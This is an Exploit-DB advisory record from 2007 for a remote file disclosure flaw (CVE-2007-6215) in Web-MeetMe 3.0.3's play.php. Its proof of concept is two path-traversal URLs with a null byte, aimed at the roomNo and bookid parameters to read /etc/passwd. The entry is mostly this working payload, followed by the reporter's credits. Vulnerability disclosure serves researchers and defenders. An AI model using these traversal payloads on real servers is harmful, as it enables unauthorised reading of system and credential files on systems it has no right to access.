Web-MeetMe 3.0.3 play.php Remote File Disclosure Vulnerability

2007-11-29T00:00:00
ID EDB-ID:4676
Type exploitdb
Reporter Evil.Man
Modified 2007-11-29T00:00:00

Description

Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability. CVE-2007-6215. Webapps exploit for php platform

                                        
                                            /--------------------------------------------------------------------------\
|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability          |
|Download Script :                                                         |
| http://sourceforge.net/project/showfiles.php?group_id=164788             |
|POC :                                                                     |
| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00  |
| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00  |
|Discovered by : Evil.Man                                                  |
|Home Page : Tryag.Com/cc                                                  |
|Email : Evil.Man@windowslive.com                                          |
|Sp.Thanx To : GoLd_M [Mahmood_ali"Tryag.Com"] & Sniper-Sa.Com             |
\--------------------------------------------------------------------------/

# milw0rm.com [2007-11-29]